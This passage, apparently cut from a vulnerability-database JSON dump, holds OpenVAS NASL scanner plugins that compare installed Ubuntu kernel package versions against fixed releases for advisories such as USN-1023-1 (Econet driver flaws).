isdpkgvuln(pkg:\"floppy-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:17:34", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1023-1", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "openvas", "title": "Ubuntu Update for Linux kernel vulnerabilities USN-1023-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3850", "CVE-2010-3848", "CVE-2010-3849"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840544", "href": "http://plugins.openvas.org/nasl.php?oid=840544", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1023_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for Linux kernel vulnerabilities USN-1023-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Nelson Elhage discovered several problems with the Acorn Econet protocol\n driver. A local user could cause a denial of service via a NULL pointer\n dereference, escalate privileges by overflowing the kernel stack, and\n assign Econet addresses to arbitrary interfaces.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1023-1\";\ntag_affected = \"Linux kernel vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 10.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1023-1/\");\n script_id(840544);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 08:26:35 +0100 (Thu, 09 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1023-1\");\n script_cve_id(\"CVE-2010-3848\", \"CVE-2010-3849\", \"CVE-2010-3850\");\n script_name(\"Ubuntu Update for Linux kernel vulnerabilities USN-1023-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-307-ec2\", ver:\"2.6.31-307.22\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-307-ec2\", ver:\"2.6.31-307.22\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-386\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-generic-pae\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-generic\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-386\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-generic-pae\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-generic\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-virtual\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-doc\", ver:\"2.6.31-307.22\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-source-2.6.31\", ver:\"2.6.31-307.22\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-307\", ver:\"2.6.31-307.22\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.31\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-386\", ver:\"2.6.15-55.90\", 